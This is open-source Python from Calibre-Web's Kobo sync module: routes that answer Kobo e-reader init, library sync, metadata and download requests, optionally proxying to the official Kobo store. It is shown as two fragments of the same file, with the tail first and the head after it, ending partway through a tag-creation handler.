            log.error("Failed to receive or parse response from Kobo's init endpoint. Falling back to un-proxied mode.")
    if not kobo_resources:
        kobo_resources = NATIVE_KOBO_RESOURCES()

    if not current_app.wsgi_app.is_proxied:
        log.debug('Kobo: Received unproxied request, changed request port to external server port')
        # Strip the port from the host header unless it ends a bare IPv6 literal.
        if ':' in request.host and not request.host.endswith(']'):
            host = "".join(request.host.split(':')[:-1])
        else:
            host = request.host
        calibre_web_url = "{url_scheme}://{url_base}:{url_port}".format(
            url_scheme=request.scheme,
            url_base=host,
            url_port=config.config_external_port
        )
        log.debug('Kobo: Received unproxied request, changed request url to %s', calibre_web_url)
        kobo_resources["image_host"] = calibre_web_url
        # unquote keeps the {ImageId}/{width}/{height} placeholders literal
        # so the device can substitute them later.
        kobo_resources["image_url_quality_template"] = unquote(calibre_web_url +
                                                               url_for("kobo.HandleCoverImageRequest",
                                                                       auth_token=kobo_auth.get_auth_token(),
                                                                       book_uuid="{ImageId}",
                                                                       width="{width}",
                                                                       height="{height}",
                                                                       Quality='{Quality}',
                                                                       isGreyscale='isGreyscale'))
        kobo_resources["image_url_template"] = unquote(calibre_web_url +
                                                       url_for("kobo.HandleCoverImageRequest",
                                                               auth_token=kobo_auth.get_auth_token(),
                                                               book_uuid="{ImageId}",
                                                               width="{width}",
                                                               height="{height}",
                                                               isGreyscale='false'))
    else:
        kobo_resources["image_host"] = url_for("web.index", _external=True).strip("/")
        kobo_resources["image_url_quality_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
                                                                       auth_token=kobo_auth.get_auth_token(),
                                                                       book_uuid="{ImageId}",
                                                                       width="{width}",
                                                                       height="{height}",
                                                                       Quality='{Quality}',
                                                                       isGreyscale='isGreyscale',
                                                                       _external=True))
        kobo_resources["image_url_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
                                                               auth_token=kobo_auth.get_auth_token(),
                                                               book_uuid="{ImageId}",
                                                               width="{width}",
                                                               height="{height}",
                                                               isGreyscale='false',
                                                               _external=True))

    response = make_response(jsonify({"Resources": kobo_resources}))
    # "e30=" is base64 for "{}" — an empty api token the device accepts.
    response.headers["x-kobo-apitoken"] = "e30="
    return response
@kobo.route("/download/<book_id>/<book_format>")
@requires_kobo_auth
@download_required
def download_book(book_id, book_format):
    """Stream the requested book file to the Kobo device."""
    return get_download_link(book_id, book_format, "kobo")
def NATIVE_KOBO_RESOURCES():
    """Return the default Kobo store "Resources" map.

    Used as the fallback body for the initialization endpoint when proxying to
    the official Kobo store is disabled or the store request fails; the image
    URL entries are overwritten afterwards to point back at this server.
    """
    return {
        "account_page": "https://secure.kobobooks.com/profile",
        "account_page_rakuten": "https://my.rakuten.co.jp/",
        "add_entitlement": "https://storeapi.kobo.com/v1/library/{RevisionIds}",
        "affiliaterequest": "https://storeapi.kobo.com/v1/affiliate",
        "audiobook_subscription_orange_deal_inclusion_url": "https://authorize.kobo.com/inclusion",
        "authorproduct_recommendations": "https://storeapi.kobo.com/v1/products/books/authors/recommendations",
        "autocomplete": "https://storeapi.kobo.com/v1/products/autocomplete",
        "blackstone_header": {"key": "x-amz-request-payer", "value": "requester"},
        "book": "https://storeapi.kobo.com/v1/products/books/{ProductId}",
        "book_detail_page": "https://store.kobobooks.com/{culture}/ebook/{slug}",
        "book_detail_page_rakuten": "https://books.rakuten.co.jp/rk/{crossrevisionid}",
        "book_landing_page": "https://store.kobobooks.com/ebooks",
        "book_subscription": "https://storeapi.kobo.com/v1/products/books/subscriptions",
        "categories": "https://storeapi.kobo.com/v1/categories",
        "categories_page": "https://store.kobobooks.com/ebooks/categories",
        "category": "https://storeapi.kobo.com/v1/categories/{CategoryId}",
        "category_featured_lists": "https://storeapi.kobo.com/v1/categories/{CategoryId}/featured",
        "category_products": "https://storeapi.kobo.com/v1/categories/{CategoryId}/products",
        "checkout_borrowed_book": "https://storeapi.kobo.com/v1/library/borrow",
        "configuration_data": "https://storeapi.kobo.com/v1/configuration",
        "content_access_book": "https://storeapi.kobo.com/v1/products/books/{ProductId}/access",
        "customer_care_live_chat": "https://v2.zopim.com/widget/livechat.html?key=Y6gwUmnu4OATxN3Tli4Av9bYN319BTdO",
        "daily_deal": "https://storeapi.kobo.com/v1/products/dailydeal",
        "deals": "https://storeapi.kobo.com/v1/deals",
        "delete_entitlement": "https://storeapi.kobo.com/v1/library/{Ids}",
        "delete_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
        "delete_tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/items/delete",
        "device_auth": "https://storeapi.kobo.com/v1/auth/device",
        "device_refresh": "https://storeapi.kobo.com/v1/auth/refresh",
        "dictionary_host": "https://kbdownload1-a.akamaihd.net",
        "discovery_host": "https://discovery.kobobooks.com",
        "eula_page": "https://www.kobo.com/termsofuse?style=onestore",
        "exchange_auth": "https://storeapi.kobo.com/v1/auth/exchange",
        "external_book": "https://storeapi.kobo.com/v1/products/books/external/{Ids}",
        "facebook_sso_page": "https://authorize.kobo.com/signin/provider/Facebook/login?returnUrl=http://store.kobobooks.com/",
        "featured_list": "https://storeapi.kobo.com/v1/products/featured/{FeaturedListId}",
        "featured_lists": "https://storeapi.kobo.com/v1/products/featured",
        "free_books_page": {
            "EN": "https://www.kobo.com/{region}/{language}/p/free-ebooks",
            "FR": "https://www.kobo.com/{region}/{language}/p/livres-gratuits",
            "IT": "https://www.kobo.com/{region}/{language}/p/libri-gratuiti",
            "NL": "https://www.kobo.com/{region}/{language}/List/bekijk-het-overzicht-van-gratis-ebooks/QpkkVWnUw8sxmgjSlCbJRg",
            "PT": "https://www.kobo.com/{region}/{language}/p/livros-gratis",
        },
        "fte_feedback": "https://storeapi.kobo.com/v1/products/ftefeedback",
        "get_tests_request": "https://storeapi.kobo.com/v1/analytics/gettests",
        "giftcard_epd_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem-ereader",
        "giftcard_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem",
        "help_page": "https://www.kobo.com/help",
        "kobo_audiobooks_enabled": "False",
        "kobo_audiobooks_orange_deal_enabled": "False",
        "kobo_audiobooks_subscriptions_enabled": "False",
        "kobo_nativeborrow_enabled": "True",
        "kobo_onestorelibrary_enabled": "False",
        "kobo_redeem_enabled": "True",
        "kobo_shelfie_enabled": "False",
        "kobo_subscriptions_enabled": "False",
        "kobo_superpoints_enabled": "False",
        "kobo_wishlist_enabled": "True",
        "library_book": "https://storeapi.kobo.com/v1/user/library/books/{LibraryItemId}",
        "library_items": "https://storeapi.kobo.com/v1/user/library",
        "library_metadata": "https://storeapi.kobo.com/v1/library/{Ids}/metadata",
        "library_prices": "https://storeapi.kobo.com/v1/user/library/previews/prices",
        "library_stack": "https://storeapi.kobo.com/v1/user/library/stacks/{LibraryItemId}",
        "library_sync": "https://storeapi.kobo.com/v1/library/sync",
        "love_dashboard_page": "https://store.kobobooks.com/{culture}/kobosuperpoints",
        "love_points_redemption_page": "https://store.kobobooks.com/{culture}/KoboSuperPointsRedemption?productId={ProductId}",
        "magazine_landing_page": "https://store.kobobooks.com/emagazines",
        "notifications_registration_issue": "https://storeapi.kobo.com/v1/notifications/registration",
        "oauth_host": "https://oauth.kobo.com",
        "overdrive_account": "https://auth.overdrive.com/account",
        "overdrive_library": "https://{libraryKey}.auth.overdrive.com/library",
        "overdrive_library_finder_host": "https://libraryfinder.api.overdrive.com",
        "overdrive_thunder_host": "https://thunder.api.overdrive.com",
        "password_retrieval_page": "https://www.kobobooks.com/passwordretrieval.html",
        "post_analytics_event": "https://storeapi.kobo.com/v1/analytics/event",
        "privacy_page": "https://www.kobo.com/privacypolicy?style=onestore",
        "product_nextread": "https://storeapi.kobo.com/v1/products/{ProductIds}/nextread",
        "product_prices": "https://storeapi.kobo.com/v1/products/{ProductIds}/prices",
        "product_recommendations": "https://storeapi.kobo.com/v1/products/{ProductId}/recommendations",
        "product_reviews": "https://storeapi.kobo.com/v1/products/{ProductIds}/reviews",
        "products": "https://storeapi.kobo.com/v1/products",
        "provider_external_sign_in_page": "https://authorize.kobo.com/ExternalSignIn/{providerName}?returnUrl=http://store.kobobooks.com/",
        "purchase_buy": "https://www.kobo.com/checkout/createpurchase/",
        "purchase_buy_templated": "https://www.kobo.com/{culture}/checkout/createpurchase/{ProductId}",
        "quickbuy_checkout": "https://storeapi.kobo.com/v1/store/quickbuy/{PurchaseId}/checkout",
        "quickbuy_create": "https://storeapi.kobo.com/v1/store/quickbuy/purchase",
        "rating": "https://storeapi.kobo.com/v1/products/{ProductId}/rating/{Rating}",
        "reading_state": "https://storeapi.kobo.com/v1/library/{Ids}/state",
        "redeem_interstitial_page": "https://store.kobobooks.com",
        "registration_page": "https://authorize.kobo.com/signup?returnUrl=http://store.kobobooks.com/",
        "related_items": "https://storeapi.kobo.com/v1/products/{Id}/related",
        "remaining_book_series": "https://storeapi.kobo.com/v1/products/books/series/{SeriesId}",
        "rename_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
        "review": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}",
        "review_sentiment": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}/sentiment/{Sentiment}",
        "shelfie_recommendations": "https://storeapi.kobo.com/v1/user/recommendations/shelfie",
        "sign_in_page": "https://authorize.kobo.com/signin?returnUrl=http://store.kobobooks.com/",
        "social_authorization_host": "https://social.kobobooks.com:8443",
        "social_host": "https://social.kobobooks.com",
        "stacks_host_productId": "https://store.kobobooks.com/collections/byproductid/",
        "store_home": "www.kobo.com/{region}/{language}",
        "store_host": "store.kobobooks.com",
        "store_newreleases": "https://store.kobobooks.com/{culture}/List/new-releases/961XUjtsU0qxkFItWOutGA",
        "store_search": "https://store.kobobooks.com/{culture}/Search?Query={query}",
        "store_top50": "https://store.kobobooks.com/{culture}/ebooks/Top",
        "tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/Items",
        "tags": "https://storeapi.kobo.com/v1/library/tags",
        "taste_profile": "https://storeapi.kobo.com/v1/products/tasteprofile",
        "update_accessibility_to_preview": "https://storeapi.kobo.com/v1/library/{EntitlementIds}/preview",
        "use_one_store": "False",
        "user_loyalty_benefits": "https://storeapi.kobo.com/v1/user/loyalty/benefits",
        "user_platform": "https://storeapi.kobo.com/v1/user/platform",
        "user_profile": "https://storeapi.kobo.com/v1/user/profile",
        "user_ratings": "https://storeapi.kobo.com/v1/user/ratings",
        "user_recommendations": "https://storeapi.kobo.com/v1/user/recommendations",
        "user_reviews": "https://storeapi.kobo.com/v1/user/reviews",
        "user_wishlist": "https://storeapi.kobo.com/v1/user/wishlist",
        "userguide_host": "https://kbdownload1-a.akamaihd.net",
        "wishlist_page": "https://store.kobobooks.com/{region}/{language}/account/wishlist",
    }
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 shavitmichael, OzzieIsaacs
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import base64
import datetime
import sys
import os
import uuid
from time import gmtime, strftime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from flask import (
Blueprint,
request,
make_response,
jsonify,
current_app,
url_for,
redirect,
abort
)
from flask_login import current_user
from werkzeug.datastructures import Headers
from sqlalchemy import func
from sqlalchemy.sql.expression import and_, or_
from sqlalchemy.exc import StatementError
from sqlalchemy.sql import select
import requests
from . import config, logger, kobo_auth, db, calibre_db, helper, shelf as shelf_lib, ub, csrf
from .constants import sqlalchemy_version2
from .helper import get_download_link
from .services import SyncToken as SyncToken
from .web import download_required
from .kobo_auth import requires_kobo_auth, get_auth_token
# Calibre data format -> list of format labels offered to the Kobo device.
KOBO_FORMATS = {"KEPUB": ["KEPUB"], "EPUB": ["EPUB3", "EPUB"]}
# Official Kobo endpoints used when proxying requests / covers upstream.
KOBO_STOREAPI_URL = "https://storeapi.kobo.com"
KOBO_IMAGEHOST_URL = "https://kbimages1-a.akamaihd.net"
# Maximum number of book entitlements returned per sync round trip.
SYNC_ITEM_LIMIT = 100
# Every route of this blueprint is nested under /kobo/<auth_token>; the token
# is handled by the kobo_auth helpers instead of the normal login redirect.
kobo = Blueprint("kobo", __name__, url_prefix="/kobo/<auth_token>")
kobo_auth.disable_failed_auth_redirect_for_blueprint(kobo)
kobo_auth.register_url_value_preprocessor(kobo)
log = logger.create()
def get_store_url_for_current_request():
    """Rewrite the current request URL so it targets the official Kobo store.

    Everything up to and including the "/kobo/<auth_token>/" prefix is
    stripped and the remaining path is grafted onto the store API base URL.
    """
    path_with_token = request.full_path.rpartition("/kobo/")[2]
    remote_path = path_with_token.rstrip("?").partition("/")[2]
    return "{}/{}".format(KOBO_STOREAPI_URL, remote_path)
# Hop-by-hop headers that must not be copied from the Kobo store's response
# onto our own response (they describe the upstream connection, not ours).
CONNECTION_SPECIFIC_HEADERS = [
    "connection",
    "content-encoding",
    "content-length",
    "transfer-encoding",
]
def get_kobo_activated():
    """Return the configured kobo-sync flag (truthy when Kobo sync is enabled)."""
    return config.config_kobo_sync
def make_request_to_kobo_store(sync_token=None):
    """Replay the current request against the official Kobo store.

    The incoming headers are forwarded minus ``Host``; when a sync token is
    given it is injected as the store's sync header.  Redirects are not
    followed so the device sees them unchanged.  Timeout: 2s connect / 10s read.
    """
    forwarded = Headers(request.headers)
    forwarded.remove("Host")
    if sync_token:
        sync_token.set_kobo_store_header(forwarded)
    return requests.request(
        method=request.method,
        url=get_store_url_for_current_request(),
        headers=forwarded,
        data=request.get_data(),
        allow_redirects=False,
        timeout=(2, 10)
    )
def redirect_or_proxy_request():
    """Forward an unhandled request to the official Kobo store.

    GETs are answered with a 307 redirect; other verbs are proxied in-process
    because the Kobo device downgrades redirected requests to GET.  With
    proxying disabled, an empty JSON body is returned instead.
    """
    if not config.config_kobo_proxy:
        return make_response(jsonify({}))
    if request.method == "GET":
        return redirect(get_store_url_for_current_request(), 307)
    store_response = make_request_to_kobo_store()
    response_headers = store_response.headers
    # Strip connection-specific headers before replaying the store's answer.
    for header_key in CONNECTION_SPECIFIC_HEADERS:
        response_headers.pop(header_key, default=None)
    return make_response(
        store_response.content, store_response.status_code, response_headers.items()
    )
def convert_to_kobo_timestamp_string(timestamp):
    """Format *timestamp* the way Kobo expects ("%Y-%m-%dT%H:%M:%SZ").

    A value without a ``strftime`` method (e.g. a broken database entry)
    falls back to the current time so sync responses never break.
    """
    kobo_format = "%Y-%m-%dT%H:%M:%SZ"
    try:
        return timestamp.strftime(kobo_format)
    except AttributeError as exc:
        log.debug("Timestamp not valid: {}".format(exc))
        return datetime.datetime.now().strftime(kobo_format)
@kobo.route("/v1/library/sync")
@requires_kobo_auth
@download_required
def HandleSyncRequest():
    """Answer the Kobo device's /v1/library/sync request.

    Collects New/Changed entitlements for books this user has not synced yet
    (optionally restricted to shelves flagged for Kobo sync), merges in
    changed reading states and shelf/tag changes, advances the sync token's
    watermarks, and returns everything via generate_sync_response().
    """
    sync_token = SyncToken.SyncToken.from_headers(request.headers)
    log.info("Kobo library sync request received.")
    log.debug("SyncToken: {}".format(sync_token))
    if not current_app.wsgi_app.is_proxied:
        log.debug('Kobo: Received unproxied request, changed request port to external server port')
    # TODO: Limit the number of books return per sync call, and rely on the sync-continuatation header
    # instead so that the device triggers another sync.
    # Watermarks from the incoming token; raised as newer items are found below.
    new_books_last_modified = sync_token.books_last_modified
    new_books_last_created = sync_token.books_last_created
    new_reading_state_last_modified = sync_token.reading_state_last_modified
    new_archived_last_modified = datetime.datetime.min
    sync_results = []
    # We reload the book database so that the user get's a fresh view of the library
    # in case of external changes (e.g: adding a book through Calibre).
    calibre_db.reconnect_db(config, ub.app_DB_path)
    only_kobo_shelves = current_user.kobo_only_shelves_sync
    if only_kobo_shelves:
        # Candidate books restricted to shelves the user marked for Kobo sync.
        if sqlalchemy_version2:
            changed_entries = select(db.Books,
                                     ub.ArchivedBook.last_modified,
                                     ub.BookShelf.date_added,
                                     ub.ArchivedBook.is_archived)
        else:
            changed_entries = calibre_db.session.query(db.Books,
                                                       ub.ArchivedBook.last_modified,
                                                       ub.BookShelf.date_added,
                                                       ub.ArchivedBook.is_archived)
        changed_entries = (changed_entries
                           .join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
                           .join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
                           .filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
                                       ub.KoboSyncedBooks.book_id == None))
                           #.filter(or_(db.Books.last_modified > sync_token.books_last_modified,
                           #            ub.BookShelf.date_added > sync_token.books_last_modified))
                           .filter(ub.BookShelf.date_added > sync_token.books_last_modified) #?? or also or from above
                           .filter(db.Data.format.in_(KOBO_FORMATS))
                           .filter(calibre_db.common_filters())
                           .order_by(db.Books.id)
                           .order_by(ub.ArchivedBook.last_modified)
                           .join(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)
                           .join(ub.Shelf)
                           .filter(ub.Shelf.user_id == current_user.id)
                           .filter(ub.Shelf.kobo_sync)
                           .distinct()
                           )
    else:
        # Whole library: every book with a Kobo-compatible format not yet synced.
        if sqlalchemy_version2:
            changed_entries = select(db.Books, ub.ArchivedBook.last_modified, ub.ArchivedBook.is_archived)
        else:
            changed_entries = calibre_db.session.query(db.Books,
                                                       ub.ArchivedBook.last_modified,
                                                       ub.ArchivedBook.is_archived)
        changed_entries = (changed_entries
                           .join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
                           .join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
                           .filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
                                       ub.KoboSyncedBooks.book_id == None))
                           .filter(calibre_db.common_filters())
                           .filter(db.Data.format.in_(KOBO_FORMATS))
                           .order_by(db.Books.last_modified)
                           .order_by(db.Books.id)
                           )
    #if sync_token.books_last_id > -1:
    #    changed_entries = changed_entries.filter(db.Books.id > sync_token.books_last_id)
    reading_states_in_new_entitlements = []
    # Bounded batch per round trip; generate_sync_response sets the "continue"
    # header while books remain, so the device keeps asking.
    if sqlalchemy_version2:
        books = calibre_db.session.execute(changed_entries.limit(SYNC_ITEM_LIMIT))
    else:
        books = changed_entries.limit(SYNC_ITEM_LIMIT)
    for book in books:
        add_synced_books(book.Books.id)
        formats = [data.format for data in book.Books.data]
        # Trigger KEPUB conversion when only an EPUB exists and kepubify is configured.
        if not 'KEPUB' in formats and config.config_kepubifypath and 'EPUB' in formats:
            helper.convert_book_format(book.Books.id, config.config_calibre_dir, 'EPUB', 'KEPUB', current_user.name)
        kobo_reading_state = get_or_create_reading_state(book.Books.id)
        entitlement = {
            "BookEntitlement": create_book_entitlement(book.Books, archived=(book.is_archived == True)),
            "BookMetadata": get_metadata(book.Books),
        }
        if kobo_reading_state.last_modified > sync_token.reading_state_last_modified:
            entitlement["ReadingState"] = get_kobo_reading_state_response(book.Books, kobo_reading_state)
            new_reading_state_last_modified = max(new_reading_state_last_modified, kobo_reading_state.last_modified)
            reading_states_in_new_entitlements.append(book.Books.id)
        # book.date_added only exists in the kobo-shelves-only query above,
        # hence the AttributeError fallbacks here and below.
        ts_created = book.Books.timestamp
        try:
            ts_created = max(ts_created, book.date_added)
        except AttributeError:
            pass
        if ts_created > sync_token.books_last_created:
            sync_results.append({"NewEntitlement": entitlement})
        else:
            sync_results.append({"ChangedEntitlement": entitlement})
        new_books_last_modified = max(
            book.Books.last_modified, new_books_last_modified
        )
        try:
            new_books_last_modified = max(
                new_books_last_modified, book.date_added
            )
        except AttributeError:
            pass
        new_books_last_created = max(ts_created, new_books_last_created)
    # Newest modification among archived (removed) books -> archive watermark.
    if sqlalchemy_version2:
        max_change = calibre_db.session.execute(changed_entries
                                                .filter(ub.ArchivedBook.is_archived)
                                                .order_by(func.datetime(ub.ArchivedBook.last_modified).desc()))\
            .columns(db.Books).first()
    else:
        max_change = changed_entries.from_self().filter(ub.ArchivedBook.is_archived) \
            .order_by(func.datetime(ub.ArchivedBook.last_modified).desc()).first()
    max_change = max_change.last_modified if max_change else new_archived_last_modified
    new_archived_last_modified = max(new_archived_last_modified, max_change)
    # no. of books returned
    if sqlalchemy_version2:
        entries = calibre_db.session.execute(changed_entries).all()
        book_count = len(entries)
    else:
        #entries = changed_entries.all()
        book_count = changed_entries.count()
    # last entry:
    # sync_cont = entries[-1].Books.id or -1 if book_count else -1
    log.debug("Remaining books to Sync: {}".format(book_count))
    # generate reading state data
    changed_reading_states = ub.session.query(ub.KoboReadingState)
    if only_kobo_shelves:
        changed_reading_states = changed_reading_states.join(ub.BookShelf,
                                                             ub.KoboReadingState.book_id == ub.BookShelf.book_id)\
            .join(ub.Shelf)\
            .filter(current_user.id == ub.Shelf.user_id)\
            .filter(ub.Shelf.kobo_sync,
                    or_(
                        func.datetime(ub.KoboReadingState.last_modified) > sync_token.reading_state_last_modified,
                        func.datetime(ub.BookShelf.date_added) > sync_token.books_last_modified
                    )).distinct()
    else:
        changed_reading_states = changed_reading_states.filter(
            func.datetime(ub.KoboReadingState.last_modified) > sync_token.reading_state_last_modified)
    # Reading states already shipped inside a NewEntitlement above are excluded.
    changed_reading_states = changed_reading_states.filter(
        and_(ub.KoboReadingState.user_id == current_user.id,
             ub.KoboReadingState.book_id.notin_(reading_states_in_new_entitlements)))
    for kobo_reading_state in changed_reading_states.all():
        book = calibre_db.session.query(db.Books).filter(db.Books.id == kobo_reading_state.book_id).one_or_none()
        if book:
            sync_results.append({
                "ChangedReadingState": {
                    "ReadingState": get_kobo_reading_state_response(book, kobo_reading_state)
                }
            })
            new_reading_state_last_modified = max(new_reading_state_last_modified, kobo_reading_state.last_modified)
    sync_shelves(sync_token, sync_results, only_kobo_shelves)
    # Persist the advanced watermarks into the token returned to the device.
    sync_token.books_last_created = new_books_last_created
    sync_token.books_last_modified = new_books_last_modified
    sync_token.archive_last_modified = new_archived_last_modified
    sync_token.reading_state_last_modified = new_reading_state_last_modified
    # sync_token.books_last_id = books_last_id
    return generate_sync_response(sync_token, sync_results, book_count)
def generate_sync_response(sync_token, sync_results, set_cont=False):
    """Build the JSON response for a library sync request.

    With store proxying enabled, the official Kobo store's own sync results
    and sync headers are merged in first (best effort).  A truthy *set_cont*
    forces the "continue" marker so the device immediately re-syncs.
    """
    extra_headers = {}
    if config.config_kobo_proxy:
        # Merge in sync results from the official Kobo store.
        try:
            store_response = make_request_to_kobo_store(sync_token)
            sync_results += store_response.json()
            sync_token.merge_from_store_response(store_response)
            for header in ("x-kobo-sync", "x-kobo-sync-mode", "x-kobo-recent-reads"):
                extra_headers[header] = store_response.headers.get(header)
        except Exception as ex:
            log.error("Failed to receive or parse response from Kobo's sync endpoint: {}".format(ex))
    if set_cont:
        extra_headers["x-kobo-sync"] = "continue"
    sync_token.to_headers(extra_headers)
    # log.debug("Kobo Sync Content: {}".format(sync_results))
    return make_response(jsonify(sync_results), extra_headers)
@kobo.route("/v1/library/<book_uuid>/metadata")
@requires_kobo_auth
@download_required
def HandleMetadataRequest(book_uuid):
    """Return Kobo metadata for one book, deferring to the store proxy when unknown."""
    if not current_app.wsgi_app.is_proxied:
        log.debug('Kobo: Received unproxied request, changed request port to external server port')
    log.info("Kobo library metadata request received for book %s" % book_uuid)
    book = calibre_db.get_book_by_uuid(book_uuid)
    if book and book.data:
        return jsonify([get_metadata(book)])
    # Unknown locally: redirect/proxy to the official store (or return empty JSON).
    log.info(u"Book %s not found in database", book_uuid)
    return redirect_or_proxy_request()
def get_download_url_for_book(book, book_format):
    """Build the absolute download URL for *book* in *book_format*.

    Behind a reverse proxy Flask's url_for generates the URL; for direct
    connections the host's port is replaced with the configured external
    server port.
    """
    if current_app.wsgi_app.is_proxied:
        return url_for(
            "kobo.download_book",
            auth_token=kobo_auth.get_auth_token(),
            book_id=book.id,
            book_format=book_format.lower(),
            _external=True,
        )
    # Strip an explicit port from the host header; bare IPv6 hosts ("[...]") stay intact.
    bare_host = request.host
    if ':' in bare_host and not bare_host.endswith(']'):
        bare_host = "".join(bare_host.split(':')[:-1])
    return "{url_scheme}://{url_base}:{url_port}/kobo/{auth_token}/download/{book_id}/{book_format}".format(
        url_scheme=request.scheme,
        url_base=bare_host,
        url_port=config.config_external_port,
        auth_token=get_auth_token(),
        book_id=book.id,
        book_format=book_format.lower()
    )
def create_book_entitlement(book, archived):
    """Create the Kobo "BookEntitlement" record describing ownership of *book*."""
    uuid_str = book.uuid
    entitlement = {
        "Accessibility": "Full",
        "ActivePeriod": {"From": convert_to_kobo_timestamp_string(datetime.datetime.now())},
        "Created": convert_to_kobo_timestamp_string(book.timestamp),
        "CrossRevisionId": uuid_str,
        "Id": uuid_str,
        "IsRemoved": archived,
        "IsHiddenFromArchive": False,
        "IsLocked": False,
        "LastModified": convert_to_kobo_timestamp_string(book.last_modified),
        "OriginCategory": "Imported",
        "RevisionId": uuid_str,
        "Status": "Active",
    }
    return entitlement
def current_time():
    """Return the current UTC time as a Kobo-style timestamp string."""
    utc_now = gmtime()
    return strftime("%Y-%m-%dT%H:%M:%SZ", utc_now)
def get_description(book):
    """Return the book's first comment text as its description, or None when absent."""
    if book.comments:
        return book.comments[0].text
    return None
def get_author(book):
    """Build the Kobo contributor fields for *book*.

    A single author is reported as a bare name string, several authors as
    parallel role/name lists; a book without authors gets Contributors=None.
    """
    authors = book.authors
    if not authors:
        return {"Contributors": None}
    if len(authors) == 1:
        only = authors[0].name
        return {"ContributorRoles": [{"Name": only, "Role": "Author"}], "Contributors": only}
    roles = [{"Name": a.name, "Role": "Author"} for a in authors]
    names = [a.name for a in authors]
    return {"ContributorRoles": roles, "Contributors": names}
def get_publisher(book):
    """Return the first publisher name, or None when the book has none."""
    if book.publishers:
        return book.publishers[0].name
    return None
def get_series(book):
    """Return the first series name, or None when the book is not part of one."""
    if book.series:
        return book.series[0].name
    return None
def get_seriesindex(book):
    """Return the book's position inside its series, defaulting to 1 when unset."""
    return book.series_index if book.series_index else 1
def get_metadata(book):
    """Assemble the Kobo "BookMetadata" dict for *book*.

    Prefers KEPUB data entries when present, lists one download URL per
    supported Kobo format label, and appends contributor and series info.
    """
    download_urls = []
    # If a KEPUB copy exists, only offer that; otherwise consider all data entries.
    kepub = [data for data in book.data if data.format == 'KEPUB']
    for book_data in kepub if len(kepub) > 0 else book.data:
        if book_data.format not in KOBO_FORMATS:
            continue
        for kobo_format in KOBO_FORMATS[book_data.format]:
            # log.debug('Id: %s, Format: %s' % (book.id, kobo_format))
            download_urls.append(
                {
                    "Format": kobo_format,
                    "Size": book_data.uncompressed_size,
                    "Url": get_download_url_for_book(book, book_data.format),
                    # The Kobo forma accepts platforms: (Generic, Android)
                    "Platform": "Generic",
                    # "DrmType": "None", # Not required
                }
            )
    book_uuid = book.uuid
    metadata = {
        "Categories": ["00000000-0000-0000-0000-000000000001", ],
        # "Contributors": get_author(book),
        "CoverImageId": book_uuid,
        "CrossRevisionId": book_uuid,
        "CurrentDisplayPrice": {"CurrencyCode": "USD", "TotalAmount": 0},
        "CurrentLoveDisplayPrice": {"TotalAmount": 0},
        "Description": get_description(book),
        "DownloadUrls": download_urls,
        "EntitlementId": book_uuid,
        "ExternalIds": [],
        "Genre": "00000000-0000-0000-0000-000000000001",
        "IsEligibleForKoboLove": False,
        "IsInternetArchive": False,
        "IsPreOrder": False,
        "IsSocialEnabled": True,
        "Language": "en",
        "PhoneticPronunciations": {},
        # TODO: Fix book.pubdate to return a datetime object so that we can easily
        # convert it to the format Kobo devices expect.
        "PublicationDate": book.pubdate,
        "Publisher": {"Imprint": "", "Name": get_publisher(book),},
        "RevisionId": book_uuid,
        "Title": book.title,
        "WorkId": book_uuid,
    }
    # Contributor fields merge in at the top level ("Contributors"/"ContributorRoles").
    metadata.update(get_author(book))
    if get_series(book):
        if sys.version_info < (3, 0):
            name = get_series(book).encode("utf-8")
        else:
            name = get_series(book)
        metadata["Series"] = {
            "Name": get_series(book),
            "Number": get_seriesindex(book), # ToDo Check int() ?
            "NumberFloat": float(get_seriesindex(book)),
            # Get a deterministic id based on the series name.
            # NOTE(review): uuid3() yields a UUID object, not a str; this relies
            # on the JSON encoder to serialize it - confirm.
            "Id": uuid.uuid3(uuid.NAMESPACE_DNS, name),
        }
    return metadata
@csrf.exempt
@kobo.route("/v1/library/tags", methods=["POST", "DELETE"])
@requires_kobo_auth
# Creates a Shelf with the given items, and returns the shelf's uuid.
def HandleTagCreate():
    """Create (or extend) a shelf from a Kobo tag POST; respond 201 with the shelf uuid."""
    # catch delete requests, otherwise the are handeld in the book delete handler
    if request.method == "DELETE":
        abort(405)
    name, items = None, None
    try:
        shelf_request = request.json
        name = shelf_request["Name"]
        items = shelf_request["Items"]
        # An empty name is rejected the same way as a missing field.
        if not name:
            raise TypeError
    except (KeyError, TypeError):
        log.debug("Received malformed v1/library/tags request.")
        abort(400, description="Malformed tags POST request. Data has empty 'Name', missing 'Name' or 'Items' field")
    # Reuse an existing same-named shelf of this user when it is editable.
    shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.name == name, ub.Shelf.user_id ==
                                              current_user.id).one_or_none()
    if shelf and not shelf_lib.check_shelf_edit_permissions(shelf):
        abort(401, description="User is unauthaurized to create shelf.")
    if not shelf:
        shelf = ub.Shelf(user_id=current_user.id, name=name, uuid=str(uuid.uuid4()))
